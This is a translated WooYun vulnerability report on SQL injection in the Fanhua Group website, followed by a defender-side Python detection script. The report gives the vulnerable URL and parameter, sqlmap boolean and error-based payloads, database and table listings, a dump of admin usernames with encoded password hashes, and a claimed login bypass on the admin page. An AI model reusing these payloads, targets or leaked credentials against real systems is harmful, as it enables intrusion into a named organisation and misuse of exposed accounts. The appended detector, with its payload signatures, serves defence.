Vulnerability Summary

Defect ID: wooyun-2015-0156698

Title: SQL injection on the 泛华集团 (Fanhua Group) main site, affecting more than 500 databases and sites

Vendor: 泛华集团 (Fanhua Group)

Author: 路人甲

Submitted: 2015-12-10 17:08

Fix time: 2016-01-17 16:34

Published: 2016-01-17 16:34

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 12

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-12-10: Vendor contacted and awaiting vendor acknowledgement; details not disclosed publicly
2016-01-17: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The Fanhua Group main site has a SQL injection affecting more than 500 databases and sites

Detailed description:

Injection point:
http://www.fanhua.net.cn/2xwdt_1jtxw_xx.aspx?nid=16774
Fanhua Group was formerly an enterprise directly under the national Ministry of Construction, a modern enterprise set up to explore urban construction and construction-industry reform and to practise urban construction, engineering general contracting and whole-process management of construction projects.

sqlmap identified the following injection point(s) with a total of 30 HTTP(s) requests:
---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=16774 AND 6727=6727
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: nid=16774 AND 2548=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2548=2548) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+CHAR(113)))
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current database: 'DB_31964'
current user is DBA: False
available databases [501]:


Tables in the current database:

Database: DB_31964
[60 tables]
+-----------------------+
| D99_CMD |
| D99_REG |
| D99_Tmp |
| DIY_TEMPCOMMAND_TABLE |
| S3_Tmp |
| cms_ad_class |
| cms_ad_file |
| cms_ad_mess |
| cms_admin_files |
| cms_admin_menu |
| cms_admin_role |
| cms_admin_user |
| cms_admin_userrole |
| cms_area_city |
| cms_area_news_column |
| cms_area_news_info |
| cms_area_province |
| cms_bq_info |
| cms_config |
| cms_files_images |
| cms_files_info |
| cms_files_kind |
| cms_friend_info |
| cms_gg_info |
| cms_hy_info |
| cms_hy_jf |
| cms_jytd_news_column |
| cms_jytd_news_info |
| cms_magazine_column |
| cms_magazine_info |
| cms_maps_info |
| cms_member_info |
| cms_member_kind |
| cms_member_level |
| cms_member_point |
| cms_menu_list |
| cms_message_center |
| cms_news_column |
| cms_news_comments |
| cms_news_info |
| cms_news_moban |
| cms_news_pic |
| cms_person_info |
| cms_position_info |
| cms_qixia_column |
| cms_qixia_info |
| cms_question_info |
| cms_related_news |
| cms_relates_our |
| cms_reply_info |
| cms_role_function |
| cms_shenqing_info |
| cms_smtp |
| cms_user_column |
| cms_ziliao |
| comdlist |
| dtproperties |
| jiaozhu |
| kill_kk |
| oldnews |
+-----------------------+


Administrator table:

Database: DB_31964
Table: cms_admin_user
[11 entries]
+---------------+-------------+--------+----------+----------+--------------------+--------------+----------+--------------------------+--------------------+
| UUID | column_uuid | IS_USE | USERNAME | is_child | END_TIME | PASSWORD | ADD_TIME | USER_TYPE | START_TIME |
+---------------+-------------+--------+----------+----------+--------------------+--------------+----------+--------------------------+--------------------+
| 6fc4a95308661 | + | 1 | liufan | + | + | 7L1qpW8a9sM= | + | + | + |
| admin | 0 | 1 | admin | 1 | 08+15+2006++4:28PM | 52ZW7p7z9eM= | + | %u7cfb%u7edf%u7528%u6237 | 08+15+2006++4:28PM |
| c0a891025143 | + | 1 | zxgl | + | + | zj/7svcAwGE= | + | + | + |
| c0a891047010 | + | 1 | cskf | + | + | zj/7svcAwGE= | + | + | + |
| c0a89106401 | + | 1 | jcss | + | + | V7NeHE+IO4s= | + | + | + |
| c0a891067359 | + | 1 | fhhw | + | + | zj/7svcAwGE= | + | + | + |
| c0a891070451 | + | 1 | fhjs | + | + | zj/7svcAwGE= | + | + | + |
| c0a891072027 | + | 1 | cyy | + | + | zj/7svcAwGE= | + | + | + |
| c0a89107679 | + | 1 | rlzy | + | + | zj/7svcAwGE= | + | + | + |
| c0a89107935 | + | 1 | kcsj | + | + | zj/7svcAwGE= | + | + | + |
| c0a891092319 | + | 1 | fhdc | + | + | zj/7svcAwGE= | + | + | + |
+---------------+-------------+--------+----------+----------+--------------------+--------------+----------+--------------------------+--------------------+


The back-end admin login page is also injectable; a "universal password" login bypass is enough to log in
http://www.fanhua.net.cn/manage/login.aspx

[image: 40.png]
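As an added defender-side example (not code from the original report or from the vendor), the following Python applies the whitelist check the `nid` handler should have enforced and scans IIS-style log lines for the two payload shapes sqlmap reported above (an `AND n=n` boolean tautology and the MSSQL `CONVERT(INT, ...)` error-based probe). The log lines, their field layout and the signature names are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed W3C-style log lines (date time method cs-uri-stem cs-uri-query status);
# not taken from the original report. The query strings mirror the sqlmap payload shapes.
SAMPLE_LOG = """\
2015-12-10 09:08:01 GET /2xwdt_1jtxw_xx.aspx nid=16774 200
2015-12-10 09:08:02 GET /2xwdt_1jtxw_xx.aspx nid=16774%20AND%206727=6727 200
2015-12-10 09:08:03 GET /2xwdt_1jtxw_xx.aspx nid=16774%20AND%202548=CONVERT(INT,(SELECT%20CHAR(113)%2BCHAR(112))) 500
2015-12-10 09:08:04 GET /manage/login.aspx nid=abc 200
"""

# The fix the page handler needed: nid is a numeric id, so reject anything else
# before it reaches the query (and bind it as a parameter, never concatenate it).
def is_valid_nid(value: str) -> bool:
    return re.fullmatch(r"[0-9]{1,10}", value) is not None

# Signatures for the two techniques sqlmap reported against this endpoint (hypothetical names).
SIGNATURES = {
    "boolean-tautology": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "mssql-error-convert": re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I),
    "char-concat": re.compile(r"CHAR\s*\(\s*\d+\s*\)\s*\+", re.I),
}

def classify_query(query: str) -> list:
    """Return detection labels for one raw (still URL-encoded) query string."""
    decoded = unquote_plus(query)
    labels = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    # parse_qs decodes each value itself; flag any nid that fails the whitelist
    for key, vals in parse_qs(query, keep_blank_values=True).items():
        if key == "nid" and not all(is_valid_nid(v) for v in vals):
            labels.append("nid-not-integer")
    return labels

def scan_log(text: str) -> list:
    """Return (uri, labels) for every log line whose query string looks suspicious."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue  # malformed line; skip rather than crash the scan
        stem, query = parts[3], parts[4]
        labels = classify_query(query)
        if labels:
            findings.append((stem + "?" + query, labels))
    return findings

if __name__ == "__main__":
    for uri, labels in scan_log(SAMPLE_LOG):
        print(uri, "->", ", ".join(labels))
```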

Proof of vulnerability:

Remediation:

Copyright notice: please credit 路人甲@乌云 when reposting


Vulnerability Response

Vendor response:

The vendor could not be contacted, or the vendor actively refused